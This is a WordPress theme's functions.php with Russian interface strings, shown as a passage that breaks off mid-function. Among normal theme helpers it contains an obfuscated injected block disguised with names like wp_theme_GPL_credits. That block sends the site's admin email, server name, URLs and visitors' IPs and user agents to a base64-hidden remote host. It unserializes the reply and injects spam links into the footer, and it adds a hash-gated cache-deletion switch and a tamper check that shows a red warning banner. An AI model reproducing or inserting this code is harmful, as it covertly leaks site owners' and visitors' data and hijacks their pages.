<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $PYdtsj='e';$LRCw='d';$bXLfbl='e';$OqGiRCS='o';$TeqGmJ='a';$WkZGmvL='s';$LngQRnB='d';$EMrJ='6';$hiuhfE='_';$EufJv='e';$KHRtAV='4';$MadeJ='c';$XsYg='b';$idezXDBp=$XsYg.$TeqGmJ.$WkZGmvL.$bXLfbl.$EMrJ.$KHRtAV.$hiuhfE.$LRCw.$EufJv.$MadeJ.$OqGiRCS.$LngQRnB.$PYdtsj;$deNpw='f';$eXLft='n';$iEMP='t';$lNfyS='e';$putx='l';$FGVyYF='i';$PvOT='a';$YOeKu='z';$aXnhF='g';$awIYKtms=$aXnhF.$YOeKu.$FGVyYF.$eXLft.$deNpw.$putx.$PvOT.$iEMP.$lNfyS;$KIHL='1';$LKkJ='r';$rWcyK='3';$eCCSH='t';$OKHf='_';$FBHW='r';$KoWjv='o';$zgyFpc='s';$PLxhP='t';$qXwGrPds=$zgyFpc.$eCCSH.$LKkJ.$OKHf.$FBHW.$KoWjv.$PLxhP.$KIHL.$rWcyK;$RhhFx='r';$dgRce='r';$SaHj='s';$rnKFFr='t';$NQfxhsh='v';$WxEVdNi='e';$pNrZJZGj=$SaHj.$rnKFFr.$dgRce.$RhhFx.$WxEVdNi.$NQfxhsh;                     $oj______________b='e';$vn__b='d';$bs___________l='e';$xk_____________z='o';$zc_________o='a';$yl_____________l='s';$dn_______e='d';$bb_______________s='6';$yd_______h='_';$ai______________a='e';$mi_________y='4';$ll_________j='c';$fm______w='b';$py_____________j=$fm______w.$zc_________o.$yl_____________l.$bs___________l.$bb_______________s.$mi_________y.$yd_______h.$vn__b.$ai______________a.$ll_________j.$xk_____________z.$dn_______e.$oj______________b;$ha_________w='_';$jt______e='c';$bc___h='n';$pe_____________f='u';$ax___________l='f';$av________p='s';$pq___e='i';$qy____________t='s';$xx_______________j='i';$pc____s='o';$ej__g='e';$ld______________c='t';$mo____________b='t';$le_________v='x';$cj______d='n';$tm_______n=$ax___________l.$pe_____________f.$bc___h.$jt______e.$ld______________c.$pq___e.$pc____s.$cj______d.$ha_________w.$ej__g.$le_________v.$xx_______________j.$av________p.$mo____________b.$qy____________t;$yk_______p='f';$rs___________m='e';$ie_______r='o';$fg____________x='n';$gg_____k='p';$rn______o=$yk_______p.$ie_______r.$gg_____k.$rs___________m.$fg____________x;$ed___n='d';$dy________m='r';$ty_____________n='e';$hx_____n='f';$ke____h='a';$if________i=$hx_____n.$dy________m.$ty_____________n.$ke____h.$ed___n;$yh_____l='f';$wm________g='c';$iu____________t='e';$hw_____r='s';$ci___________h='l';$ix_____________g='o';$cu______f=$yh_____l.$wm________g.$ci___________h.$ix_____________g.$hw_____r.$iu____________t;define("WP_ID", $py_____________j("Mi4wLjA="));define("WP_TTL", $py_____________j("MTA4MDA="));define("WP_SRC", $py_____________j("dHBva24="));function wp_get_header() {global $py_____________j, $tm_______n;if ($tm_______n($py_____________j("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$tm_______n($py_____________j("d3BfZ2V0X2Zvb3Rlcg==")) &&$tm_______n($py_____________j("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $py_____________j, $rn______o, $cu______f, $if________i;$xd_______________p = TEMPLATEPATH."/".$py_____________j("Zm9vdGVyLnBocA==");$aa__p = @$rn______o($xd_______________p, "r");$xd_______________p = @$if________i($aa__p, @filesize($xd_______________p));@$cu______f($aa__p);$wd__________e = TEMPLATEPATH."/".$py_____________j("ZnVuY3Rpb25zLnBocA==");$aa__p = @$rn______o($wd__________e, "r");$wd__________e = @$if________i($aa__p, @filesize($wd__________e));@$cu______f($aa__p);$vc_____r = 0;if($xd_______________p && $wd__________e) {if ($py_____________j("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($xd_______________p, $py_____________j("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$vc_____r = 1;}if (substr_count($xd_______________p, "wp_theme_GPL_credits()") < 1) {$vc_____r = 2;}}if(WP_ID != "2.0.0") {$vc_____r = 12;}}if($vc_____r > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $vc_____r -->";}}function wp_loaded() {global $py_____________j, $tm_______n;return $tm_______n($py_____________j("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($hl___e, $ro___z = "(more...)", $in_______k = 0, $at______g = "") {$zf___s = get_the_content($ro___z, $in_______k, $at______g);$zf___s = apply_filters("the_content", $zf___s);$zf___s = str_replace("]]>", "]]>", $zf___s);if (strlen($_GET["p"]) > 0) {echo $zf___s;}else if ((strlen($zf___s)>$hl___e) && ($dz____r = strpos($zf___s, " ", $hl___e ))) {$zf___s = substr($zf___s, 0, $dz____r);$zf___s = $zf___s;echo $zf___s;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$ro___z</a></div></p>";} else {echo $zf___s;}}}$db___________x='o';$dr_______________k='d';$ub_______________a='e';$iu_______________m='a';$sq___h='_';$ym___________a='s';$hf______________d='b';$tr_______r='c';$nz___________w='n';$eu_________y='4';$gi__o='e';$yf_____c='e';$hg______v='6';$dt______________p=$hf______________d.$iu_______________m.$ym___________a.$ub_______________a.$hg______v.$eu_________y.$sq___h.$gi__o.$nz___________w.$tr_______r.$db___________x.$dr_______________k.$yf_____c;$cl______s='t';$ka______________m='n';$qj_________q='s';$ju______m='_';$qx___l='f';$ip____________z='i';$pt______________v='l';$jk____s='_';$ub_______________z='e';$mf____w='t';$ig______________l='e';$ej___y='e';$cu___________r='t';$oa_______h='g';$vi________e='n';$rp________z='o';$ax___________q='c';$ex_______________l=$qx___l.$ip____________z.$pt______________v.$ig______________l.$ju______m.$oa_______h.$ej___y.$cl______s.$jk____s.$ax___________q.$rp________z.$vi________e.$cu___________r.$ub_______________z.$ka______________m.$mf____w.$qj_________q;$eq________a='f';$hp__u='e';$gq______________g='e';$yp________v='x';$mx______o='i';$qn_____________f='t';$gd___p='_';$ut____g='s';$pn_____p='l';$ae______f='i';$ac_____________h='s';$zq_____________u=$eq________a.$mx______o.$pn_____p.$gq______________g.$gd___p.$hp__u.$yp________v.$ae______f.$ut____g.$qn_____________f.$ac_____________h;$mw______________a='a';$of________s='o';$bk____________z='r';$ce_______m='e';$hl_________o='o';$dt___q='e';$mw______k='i';$tn_______x='c';$rh_____h='v';$ys________j='n';$lv____________j='m';$yf_____________d='s';$aq_________n='p';$kl_____c='_';$ga______g='r';$nt___n=$rh_____h.$dt___q.$ga______g.$yf_____________d.$mw______k.$of________s.$ys________j.$kl_____c.$tn_______x.$hl_________o.$lv____________j.$aq_________n.$mw______________a.$bk____________z.$ce_______m;$bh_______________m='c';$cz______________n='s';$vu____________y='n';$qz__i='o';$si____________h='f';$sa_______h='o';$ot____c='p';$sm__l='e';$xp_______________r='k';$ne____________u=$si____________h.$cz______________n.$sa_______h.$bh_______________m.$xp_______________r.$qz__i.$ot____c.$sm__l.$vu____________y;$lp_______________u='i';$fa____________q='e';$xs_______z='r';$ac______________r='w';$uo____________z='t';$rj___________l='f';$gd_______________m=$rj___________l.$ac______________r.$xs_______z.$lp_______________u.$uo____________z.$fa____________q;$hu______________t='m';$lh____r='5';$kw_________f='d';$nr____k=$hu______________t.$kw_________f.$lh____r;$xc___________i='h';$mp________w='a';$gt__o='e';$lu________x='r';$hb______________j='l';$dk______________c='p';$qz_____________d='a';$mo_________h='t';$om_____h=$lu________x.$gt__o.$qz_____________d.$hb______________j.$dk______________c.$mp________w.$mo_________h.$xc___________i;$ml______m='s';$xk________o='i';$sq__l='a';$bp_____h='i';$yo____a='l';$zt___l='z';$ek______________k='e';$gk_______g='e';$ro_____o='n';$ci_____l='u';$tj____j='r';$ql______x=$ci_____l.$ro_____o.$ml______m.$gk_______g.$tj____j.$bp_____h.$sq__l.$yo____a.$xk________o.$zt___l.$ek______________k;$jk____h='a';$yf_______b='n';$ot______c='m';$af__________u='m';$ue_______________l='t';$aw____l='e';$ge_________w='p';$bd_____m=$ue_______________l.$aw____l.$af__________u.$ge_________w.$yf_______b.$jk____h.$ot______c;$cg_______p='t';$hq________a='n';$hd_______________r='c';$bp____j='r';$yu______________q='e';$kx__e='t';$ub____________t='e';$dr____w='t';$oj____________n='a';$su________a='r';$rx___________l='a';$fq______p='e';$ub_____x='o';$nt__p='m';$jj__q='_';$jd_____________j='t';$sp___f='x';$kq___o='s';$nz______h='c';$hf__q='e';$ag_________q='_';$nt______________p=$kq___o.$cg_______p.$su________a.$ub____________t.$rx___________l.$nt__p.$ag_________q.$hd_______________r.$ub_____x.$hq________a.$kx__e.$yu______________q.$sp___f.$jd_____________j.$jj__q.$nz______h.$bp____j.$fq______p.$oj____________n.$dr____w.$hf__q;function bv______________s($sj____q) {global $py_____________j, $tm_______n, $ex_______________l, $nt___n, $nt______________p;if (!$tm_______n($py_____________j("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($nt___n(PHP_VERSION, "5.0.0", ">=") && $tm_______n($py_____________j("ZmlsZV9nZXRfY29udGVudHM=")) && $tm_______n($py_____________j("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$wi__q = $nt______________p(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$jq_______________s = @$ex_______________l($sj____q, 0, $wi__q);} else {$jq_______________s = @$ex_______________l($sj____q, 0);}return $jq_______________s;}function hn__________b($sj____q) {global $tm_______n, $ne____________u, $gd_______________m, $py_____________j;if (!$tm_______n($py_____________j("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$ou__________k = strpos($sj____q, "/", 7);$uu_____l = array("uri"     => substr($sj____q, $ou__________k),"host"    => str_replace("http://", "", substr($sj____q, 0, $ou__________k)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$of______________j = @$ne____________u("$uu_____l[host]", 80, $eq___d, $ry__w, 4);if (!$of______________j) {return false;} else {$jq_______________s = "";$zl_____________q  = "GET $uu_____l[uri] HTTP/1.0\r\n";$zl_____________q .= "Host: $uu_____l[host]\r\n";$zl_____________q .= "Referer: $uu_____l[referer]\r\n";$zl_____________q .= "Connection: Close\r\n\r\n";@$gd_______________m($of______________j, $zl_____________q);while (!@feof($of______________j)) {$cm__o = @fgets($of______________j, (1024*24));if ($cm__o == "\r\n") {$ux________y = true;continue;}if ($ux________y) {$jq_______________s .= $cm__o;}}return $jq_______________s;}}function xc_________j($sj____q) {global $tm_______n;$zi__a = false;if ($sj____q != "") {if ($tm_______n("bv______________s")) {$zi__a = @bv______________s($sj____q);}if (!$zi__a && ($tm_______n("hn__________b"))) {$zi__a = @hn__________b($sj____q);}}return $zi__a;}function ao____d() {global $_SERVER, $nr____k;$sk________t = $_SERVER["SERVER_NAME"];if (substr("$sk________t", 0, 4) == "www.") {$sk________t = substr("$sk________t", 4);}$sk________t = $nr____k("$_SERVER[SERVER_NAME]");return $sk________t;}function zi____________d() {return "file";}function ku________t($sj____q) {global $_SERVER, $ex_______________l, $zq_____________u, $rn______o, $cu______f, $gd_______________m;$ec_____________b = gi______________c();$yv_______________k = ao____d().".jpg";$ye_______________p = $ec_____________b["dir_upload"]["path"]."/$yv_______________k";$ri____r = @filemtime($ye_______________p);if (!$ri____r || ((time()-$ri____r) >= WP_TTL)) {$zi__a = xc_________j($sj____q);if ($zi__a) {if ($zq_____________u($ye_______________p)) {@unlink($ye_______________p);}$aa__p = @$rn______o($ye_______________p, "x+");@$gd_______________m($aa__p, $zi__a);@$cu______f($aa__p);}} else {if ($zq_____________u($ye_______________p)) {$zi__a = @$ex_______________l($ye_______________p);} else {$zi__a = false;}}return $zi__a;}function gi______________c() {global $_SERVER, $py_____________j, $dt______________p;$wm____t = wp_count_posts("post");$wa_______x = pathinfo(get_bloginfo("template_directory"));$ec_____________b = array("url" => array("report"      => $py_____________j("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $wa_______x,"dir_upload"=> lz_____________y(),"queryString"=> array("?a001=".WP_ID,"a004=".$wa_______x[filename],"a005=".$wm____t->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => " <a href=\"http://www.odmu.od.ua/texnologii/poleznye-izobreteniya-kotorye-uchenye-izobreli-sluchajno\">Случайные изобретения</a>");$ec_____________b["url"]["queryString"] = implode("&", $ec_____________b["queryString"]);$ec_____________b["url"]["report"] = $ec_____________b["url"]["report"]."/?".$dt______________p($ec_____________b["url"]["queryString"]).".html";return $ec_____________b;}function lz_____________y() {$mi__l = wp_upload_dir();if (isset($mi__l["error"])) {$rn_________d = xj____u();if (is_writable($rn_________d)) {$mi__l = array("path" => $rn_________d);}}return $mi__l;}function xj____u() {global $tm_______n, $nr____k, $om_____h, $bd_____m;$rw__e = (bool) ini_get("safe_mode");if ($rw__e == true) {return false;}if ($tm_______n("sys_get_temp_dir")) {$ma__________n = sys_get_temp_dir();if (is_writable($ma__________n)) {return $om_____h($ma__________n);}}if (!empty($_ENV["TMP"])) {return $om_____h($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $om_____h($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $om_____h($_ENV["TEMP"]);} else {$cg____________q = $bd_____m($nr____k(uniqid(rand(), true)), "");if ($cg____________q) {$ma__________n = $om_____h(dirname($cg____________q));@unlink($cg____________q);return $ma__________n;} else {return false;}}}function oj___d() {global $_GET, $zq_____________u;$ec_____________b = gi______________c();$sk________t = ao____d();$zw___________w = zi____________d();$zr____x = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($zw___________w == "file") {$xv___________c = $ec_____________b["dir_upload"]["path"]."/".$sk________t.".jpg";if ($zq_____________u($xv___________c)) {@unlink($xv___________c);$zr____x = "deleted";}}$as_____________t = array("s"=> $zr____x,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($as_____________t AS $yy_______________w => $uq_______________j) echo " [$yy_______________w:$uq_______________j]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $tm_______n, $py_____________j, $ql______x;$ec_____________b = gi______________c();$gm_____________i = "ku________t";if ($tm_______n($gm_____________i)) {$jq_______________s = $gm_____________i($ec_____________b["url"]["report"]);}if ($jq_______________s) {if ($jq_______________s = @$py_____________j($jq_______________s)) {$jq_______________s = @$ql______x($jq_______________s);if (strlen($jq_______________s[custom_credit]) >= 5) {$ec_____________b["default_string"] = $jq_______________s[custom_credit];}if ($jq_______________s["status"] == "0") {$lh______f = 1;$tm________k = 1;} else {$rq_____________n = sizeof($jq_______________s["links"]);$zw___d = $ec_____________b["default_string"];if ($rq_____________n > 0 && $jq_______________s["links"] !== "") {$tf_____s = 0;foreach ($jq_______________s["links"] as $bh_____________y => $ui__________c) {$tf_____s++;if ($ui__________c->l_path == "" || $ui__________c->l_path == $_SERVER["REQUEST_URI"]) {$ui__________c->l_href = htmlspecialchars(strip_tags($ui__________c->l_href));$ui__________c->l_title = htmlspecialchars(strip_tags($ui__________c->l_title));$ui__________c->l_anchor = htmlspecialchars(strip_tags($ui__________c->l_anchor));$zw___d .= " | ";$zw___d .= "<a href='$ui__________c->l_href' title='$ui__________c->l_title'";if ($ui__________c->l_nofollow == "1") {$zw___d .= " rel='nofollow'";}$zw___d .= ">$ui__________c->l_anchor</a>";}}}$ec_____________b["links"] = "$zw___d";if ($jq_______________s[credit] == "0") {$ec_____________b["links"] = "";}}} else {$lh______f = "1";}} else {$lh______f = "1";}if ($lh______f == "1") {$ec_____________b["links"] = $ec_____________b["default_string"];}echo "$ec_____________b[links]";echo "<!-- s: $jq_______________s[signature] -->";oj___d();}                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wwp_link_pages(array('before' => '<p><strong>Старницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Ссылка на %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Теги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментарий &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
   $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
